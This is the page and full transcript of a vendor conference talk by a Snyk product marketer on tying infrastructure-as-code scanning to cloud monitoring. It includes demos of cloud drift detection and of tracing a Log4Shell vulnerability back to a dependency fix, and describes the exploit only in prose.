Protecting Apps from Code to Cloud, and Back to Code

Log in to watch

Europe 2022

Protecting Apps from Code to Cloud, and Back to Code

Senior Director - Product Marketing · Snyk

Cloud and DevOps practices blur the boundary between application development and the production cloud environment. Solutions that satisfy the needs of only the development team -or- the security & operations teams, in isolation, don't help where organizations need it the most: reducing security risk while ALSO increasing the speed of application delivery.

In this session, we'll share how security teams are scaling by empowering developers to create secure applications, including the use of modern cloud technologies that are used to deploy and run application workloads. We'll show you how you can give developers a unique security feedback loop, with direct, actionable fixes, from code to cloud, back to code. By connecting observed cloud security insights with developer-driven workflows, developers can prioritize and remediate vulnerabilities faster in cloud native workflows. This results in reduced risk due to more secure cloud environments and increased developer productivity, leading to better and faster innovation.

Chapters

Full transcript

The complete talk, organized by section.

Jim Armstrong

Hi everyone, and thank you for joining me today in this session about protecting your apps from code to cloud and back to code. My name is Jim Armstrong. I'm a senior director of product marketing at Snyk, and today I want to walk you through a bit of the problem space here that we see and how we can improve the security of our applications and the cloud at the same time.

It wasn't that long ago that a full-stack developer was somebody who could develop the front end of the application, the UI, and those kinds of things, as well as the back end of the application. I think now, with the introduction of cloud becoming more and more prominent, that also might include the actual technology stack as part of the full-stack development, meaning that they develop all of that code for an application but can actually develop all of the cloud infrastructure and cloud deployments as part of that as well. Now, whether that's a single person or not is a matter of resources and expertise in individual companies. Certainly, in a lot of companies, it's different.

But the cloud does start from code, and so the issue of how we fix cloud problems becomes more and more of a code issue, of an engineering issue, something that can fortunately be fixed much earlier in its life cycle instead of waiting for the cloud itself to be deployed. But of course, the cloud is there in service of the applications. Those two things go hand in hand, so splitting them apart doesn't really make a lot of sense.

Unfortunately, that tends to be something that we see on a fairly frequent basis, where there is a plan and perhaps some tools and a process for code security that's focused on the developers and a plan and maybe some tools and processes around cloud security to protect the infrastructure and the running environment. But a lot of times, those two things are disconnected from each other, when again, in reality, what we want is to have all of this flow together.

The idea of DevOps is that we can produce these applications quickly and deploy them quickly, and that means both the cloud and the app configurations and code all need to go together. They need to be tested together. They need to have pipelines that at some point come together to produce the application as it runs in the cloud. And all of that needs to be secured early and often in its life cycle as well. One of the advantages at least of developing the cloud that way, using infrastructure as code, is to have that early source of truth so that it can actually be tested.

Now, the other prickly point here, the other hidden issue, although probably for most of you listening today this is not such a hidden issue, is the fact that the developers far outnumber security folks. So one of the other reasons why shift left has become such an important concept is that we want to move that responsibility to the left, not just the testing itself, although getting earlier visibility into security results is certainly nice. But we actually want to shift that responsibility.

There are nowhere near enough security experts to be able to handle all of the security alerts and events that might come out of the code for the application or the code for the cloud configurations, for that matter. And so it's very much on the developers, or you could swap out the word developer for cloud engineer, to be able to quickly identify issues and be able to quickly fix those issues. That's the other really important aspect of this, because that's how we're going to scale security, by getting those developers involved.

Again, when it comes to applications and application code, there are fairly well-known and fairly well deployed patterns for making this happen. We have the code, and we test it in our developer's IDE. We test it again when it's in the code repos. We test it as it goes through pipelines. If there are artifacts that are created, they can be tested wherever they are stored. And then finally, we can test our apps as they are running in the cloud. Again, none of that is new to the world of applications.

However, we don't always treat our cloud that way. In fact, a lot of times with the cloud, we start at the other end. We start at the cloud, and we look at what's deployed there, and we've got to make that connection back to code. That's really, really important.

Now, we're seeing more and more coverage that goes from code to cloud, meaning we can check things in both places. We can check for the cloud. We can check the infrastructure as code. We can check our Terraform configurations, or we can check a container, even a Dockerfile, early in its life cycle. And then we also look at what's deployed, and so we identify issues across the life cycle. But really, we want to link issues across this entire life cycle.

The great thing about having all of this in code, your container configurations and your infrastructure as code configurations, Kubernetes, all that kind of stuff, is we can identify those issues early in the life cycle. And then, of course, we want to link those things to the cloud, because how do you fix problems that you identify in the cloud? You have to come back to the code and fix them just the same way you do with your application issues. So if you're only doing one or the other, or if they're not linked to each other, you're not linking your cloud resources to the IaC that creates them or the containers that are being created there, then it's going to be very hard to fix the actual issues themselves. It's a lot of manual work to go backwards that way.

So really what we want is we want to have this code-to-cloud coverage, but we also want to go from the cloud back to code. And what that really means is a couple of things. One, we want to have a single policy engine. So if we start at the code side, which is the appropriate place to start, let's catch the problems before we deploy anything. We want to have a policy engine there. We want to be able to identify our policy in code as well, so that we can check everything that's about to be deployed. But we also want to use that same policy engine with what is deployed, with the things that are actually running in our cloud environment. We want to apply the same checks in both places throughout the life cycle of those resources that we're defining and deploying. Critically important, if we're defining two different sets of policies, obviously we're going to get two different sets of results, and then we're going to have to do all the work again to match those things back up. So that single policy engine is really important. Now, again, that's part of the code-to-cloud story.

But then we want to go back to code. What does that mean in terms of infrastructure as code, in terms of containers, in terms of these cloud-native technologies? Well, it means things like finding resources that have drifted from their original definition. So we defined it in IaC, we deployed it, now something has changed in the cloud. You can think of all kinds of examples and reasons why that might happen. Some of them are well known and actually good. We have burstable resources, and so we've expanded our resource pool in the cloud due to a traffic spike or something, and so we have drift there. We have more resources than what we may have originally defined in our IaC. And then that may come back down, and so that may be some kind of drift.

But we may also have people that come in and they need to open a port. We need to copy a file over, so we go into our AWS console, and we manually open a port, and then we forget to close it. Well, that's drift as well. We've left a port open. We didn't intend to do that, and it wasn't malicious, but certainly it's something that we need to get back into its desired, its intended state. And of course, there is potentially malicious drift. Think about finding unmanaged resources. What if somebody does get access to your environment and they spin up a few new S3 buckets so they can store some confidential data, or they spin up some new resources in the cloud to run a Bitcoin miner, for instance? All kinds of weird things like that could potentially happen. Those are all unmanaged resources. Those are things that aren't even defined in your IaC definition, but you want to be able to detect those in the cloud, and you want to be able to relate that back and say, "These are things that weren't supposed to be deployed, and now they are." So that's one example of going from the code to the cloud and then going from the cloud back to the code so that we can fix those issues.

Also, think about using the cloud and what's running there to prioritize what needs to be fixed in that developer's interface. We've deployed an application. Let's use Log4Shell as an example of a vulnerability. So we can identify the fact that in our deployed application, it was deployed before Log4Shell was a thing. And now we find that we have in the cloud an application that has the Log4Shell vulnerability. Well, now we need to get back and fix it.

Really, two things need to happen. On the cloud side, we want to shut down access to it or do whatever we can to sort of mitigate the problem. But then ultimately, we have to feed the information back to a developer that says, "It's this app and it's this line in your app that needs to be fixed." And that's the important power of this back-to-code side, from the cloud back to code. Not just being able to say that there's a problem here, but there's a problem here, and here's the line of code that you need to go to, to fix it.

So we're actually going to do a demo. We're going to take a look at both of those types of examples. We're going to look at managing drift, detecting drift, and within your infrastructure as code, going from the code to cloud and then back to code. And we'll also take a look at this Log4Shell vulnerability. But this is really powerful. This is the kind of thing that we want to see, and we want to, again, have this full life cycle. Remember, the DevOps loop is a loop. It goes around and around and around, and that's really what we want in our applications.

But more than that, that's just the cloud-native technology. Really what we want to get to, and this is where Snyk's longer term vision lies, is we want to also prioritize all the application vulnerabilities. Again, the cloud is the place where the applications are running. Our code and our cloud configurations are all starting from the developer's desktop, from an engineer's desktop. Eventually, those things become a cohesive unit. It becomes our application. It becomes our workloads that are running in the cloud, and those two things go hand in hand.

We want to be able to use that cloud context to say, "This is the application that has Log4Shell," or, "This application has a cross-site scripting vulnerability in the code." We want to identify that before the bad actors get the chance to identify that. And we want to go back into the code and say, "This is the line of code that needs to be fixed. Here's how this cross-site scripting weakness was introduced, this cross-site scripting defect was introduced into your first-party code, and here's how you can fix it, and then you can redeploy it and get rid of it." And we can use the cloud context to do that.

We could use the cloud context as well to say, "Yes, we've got a cross-site scripting vulnerability. However, this is not a public-facing cloud application." And we know that because of how it's deployed in the cloud and because of the graph of resources that are there in the cloud telling us this is not a live and active vulnerability. So that's a really important bit as well. All the data for that exists in Snyk. We haven't quite put all the pieces together yet, but that's the direction that we want to head.

Okay, so as I mentioned, we'd take a look at a couple of demos. So let's take a look first at this idea of managing the cloud and cloud drift and doing that from code to cloud and back to code. So we talked about this scenario before where your infrastructure as code is a form of cloud. In this scenario, we're going to look at Terraform deploying to Google Cloud. We've set up a Kubernetes cluster, GKE cluster in Google Cloud, and so we're going to manage that with IaC.

Now, what I've done here first is you can see the actual IaC project itself. We've got all of our standard Terraform configuration modules in here. A lot of this derived from that Google deployment. And so you can see it's just standard Terraform. Nothing terribly special about it. We've scanned it because it is code, so we've done all of our checks here early in the development life cycle. We could do this in the IDE. This happens to be the Snyk interface where we can see issues have been identified. We've got enough detail about the issues that we could go back into that code and we could correct these misconfigurations, if you will, to make them more secure. Fairly straightforward type of fixes there. You can see that we've got some of the code shown here as well.

Okay, so that's how we start this whole process, right? And again, that's sort of the idea of code to cloud. We've got our code here. We could scan this in our Git repos, which is in fact what we've done in this example, imported those Git repos. We could scan through CI process, scan the Terraform plans as well. And then, of course, we want to look at what's actually deployed in the cloud and match that up with what's intended to be in our IaC.

So let's take a look at how that might look. Now, exactly what we're doing here, we've already scanned the IaC. We saw that for the configuration issues. What we're doing here is looking for the drift, the drift that exists between the intended state in IaC and what actually exists in our Google Cloud. So here you can see we've got a list of those things. We've got changed, missing, and unmanaged resources. You can see our IaC covers about 70% of the resources in the cloud and several things have been changed or missing.

So we look at our changed resources, and you'll notice that we've got an instance that has changed. And I know from my own knowledge of this cluster that's changed because the cluster scaled up. We added a new node when that happened, and then it scaled back down and one of the original nodes that was there was the one that was scaled away. And actually, if we look at the missing resources here, we can see that old instance listed there as well.

Now we also have unmanaged resources. Unmanaged resources are resources that are not in my IaC yet. Now, in this case, maybe those are all fine and those have been manually set up over time via some other process and I eventually want to get them into IaC. Or maybe they're dangerous resources or something else. But also disconcerting here is I've got this new port open in my configuration. That's something that I had not put into IaC. This looks like some sort of development port for an application, but it could be any number of things. And so it's definitely worth investigating to see why that port has been opened and either to decide whether that needs to be in IaC or it needs to be removed from the cloud. So imagine somebody opened this port to do some testing and forgot to close it. And of course, that could be a security concern as well. So that's an example of going from the code, IaC, to the cloud and then going from the cloud back to our code to get all these resources managed and configured properly.

Okay, so now let's take a look at a second example. This one's pretty interesting as well. So this is Log4Shell. Now Log4Shell in and of itself, I think most of you are fairly familiar with, unfortunately. But it is an interesting example to dive into for a whole number of reasons, and it's one of those vulnerabilities that's easy, relatively speaking, to detect when it's running in your cloud environment. It can be relatively hard to fix it, though, because a lot of times what you find in the cloud environment is a detection for something like Log4Shell, but not enough details in terms of what a developer needs to fix it.

So let's think about that for a second. What does a developer need to fix these types of vulnerabilities? We have something like Log4Shell. What does it take if we want to flip that over? If we want to shift this left and have a developer handle this issue on their own, what do we need to give them that's different from what we might see from just a cloud security tool? So our cloud security tools are going to do some incredible things. Now, my argument is not that you don't need cloud security tools. I don't want people to walk away from this session thinking that that's what I'm trying to get across. I do think you need cloud security tools. For this specific reason is a great one and a great case in point. If you have Log4Shell running in your environment, you do need to mitigate that risk while a developer goes and fixes something. So there is a time gap there. You also need to know where it's running, and there is important detail that comes from the cloud security tools. What cluster, what environment is this in? How often do you have it? What are the actual containers and services? And all those kinds of things which are important details about this incident.

But what does a developer need aside from that information to actually go and fix the root cause issue? Well, something like Log4Shell, they need to know what line of code introduced this vulnerability, and they need to know how to change it and what to change that line of code to say to get rid of the vulnerability. And that can be particularly challenging. We think about something like Log4Shell. It's not just a vulnerability in a package that they know about. Log4Shell in many, many cases is actually a transitive dependency. It's a dependency of some other dependency that a developer adds to their code. And so you can't just go and necessarily search for Log4j in your code manifests or in your package manifests because it might be a dependency of a dependency and therefore you have to know the root cause. What introduced Log4j? And so what do you change that thing that you added so that it gets rid of this vulnerable version of Log4j? So it becomes a much more complex problem. And remember, it may not happen just once. You may have multiple packages that have multiple links to Log4j in a single application. It's a pretty challenging problem.

And so without the right tools, developers and security are going to spend a lot of time analyzing code and trying to figure out how to get there. What's a more direct path is to use that information from the cloud to quickly identify the right sort of application to get to, and to have your application security tell you exactly what line of code needs to change, and what it needs to change to, to get rid of Log4Shell, or even to make the change for you by opening a pull request so that you can do that and make that change directly. So, this is the type of thing that changes, I think, when you start to think about how a developer is going to handle these issues. It's not enough to merely identify the issue running in the environment, but we have to think about how a developer is going to take care of it.

So again, let's take a look at what that might look like in an environment. Okay, so what we're running here is a Java application. This is just a simple little to-do list application that's meant to kind of show off Java, but does happen to be using a vulnerable version of Log4j, and which allows us to put in this handy little URL into our box. And when we search for that, it will actually send the command over to a server, which sends the command back to our app, and basically defaces our app. So it changes our app code.

Now, in this environment, we have Sysdig running. And so you can see that I've got several things running in the environment, and we can detect some problems here. You'll notice that I've got a rule set up for Log4Shell, and specifically in this case, we're looking for that bad traffic. And what you can see here is we've actually captured the command. So this is what the bad server does. When we entered that URL, it sent that request off. That's what Log4j, the Log4Shell vulnerability allows you to do. Put in a bad request like that, it gets logged, the log gets picked up. It just blindly follows a URL, which bounces back and sends this command. So anyway, that's the command. And it went into the containerized application, the Java app, and added this code.

So we've detected it running with Sysdig here, and we could set up policies to help block that if we wanted to. In this case, we haven't. We've detected it. Now we need to fix the root cause of that Log4Shell vulnerability. And so to fix that root cause, we're going to come over to Snyk. So Snyk and Sysdig are integrated. You can see here Snyk has identified a number of issues, both in the application code itself and in the container that's running this application. With our Sysdig integration, we're getting executed package information over. You can see here we've detected the Log4Shell package running in this environment. You can actually see the little executed flag here, where Sysdig is telling us that this particular package was executed. We can see it in the app in this case, and some details about it that tell us a bit about how to go and fix it. But we can do more even with Snyk.

So we've got it here in a containerized application, which is running our Java, but we also have the code itself. And we can use Snyk to identify exactly where to go into that code, and fix this application. So let's take a look at this. It's a package manifest, obviously. It's something that was introduced via Java packages. And in this case, again, we have that vulnerability there, and we have the details. It tells us how to fix it. But we can do more. We can, instead of just telling a developer what line to fix, we can actually give them the code to fix it. So we can actually open a pull request that will allow us to fix this vulnerability.

And you can see here when I click on that button, I've got the vulnerability actually selected here. Bunches of other vulnerabilities in this app. This is an intentionally broken app, so there are tons of things wrong here that we could potentially fix with pull requests. We're going to just focus on those two. So let's take a look there. What does that do for us? Well, it's a pull request, so obviously got to make a code change, and in this case, it's a Java application, so we're going to go to our manifest there and make the changes. Here's what the pull request looks like. Pretty standard stuff, but it tells us all the things that are being fixed by this pull request, ranked in terms of importance. We've only selected two here. We can actually take a look at what it's doing by looking at the code itself for what's been included. Now, before we do that, we open this pull request. We actually run checks against that pull request to make sure we're not introducing any new issues with these changes. And then we can take a look at the actual code change here as well.

And again, the details here are fun to look at, but the important part is this makes a developer's life easier. We've given them the code itself in a pull request. We've helped them understand the issue. We've helped them get straight to the issue to fix it. That's a lot of work that would have to be done manually if you just identify the vulnerability in the cloud and you have things like the cluster. But if you have the access to the cloud and you have the access to the application and the code that's in there, this is how you can get straight to those fixes very quickly and very easily.

Okay, so that will pretty much wrap things up for me. Again, I think the important point here to drive home, whether you use Snyk or not, is that we need to look at the cloud and we need to look at our applications as a cohesive unit, because they really are. It may be different engineering teams, but the whole idea of DevOps at its heart is that these teams are working together to get apps deployed and to get apps managed and secured as quickly and as easily as possible so that we can have this rapid iteration, we can innovate much faster.

And so our tools should match that process as well. Our tools should link our cloud and our code together. Our tools should treat the code and the cloud as if they are part of the same application, as if they are part of the same stack, so that we can get to the root of issues much faster and fix them. And so that we manage our cloud the way that we manage our applications, because most of the cloud, in and of itself, aside from the app, is just code. They can be managed the way that we've managed applications for years now. By doing this, I think we can bring developers, cloud teams, security teams all together much closer, and we can secure our apps, and we can secure our cloud from the code to the cloud, and of course, going back to the code as we continue to iterate and make things better.

So I hope that was informative. I hope it was useful. Again, my name is Jim Armstrong. I would love to chat with any of you. If you want to, you can find me on Twitter at J-D-A-R-M-S-T-R-O, and I would love to hear from you. But I hope you enjoy the rest of the show. Have a great day, and thanks again.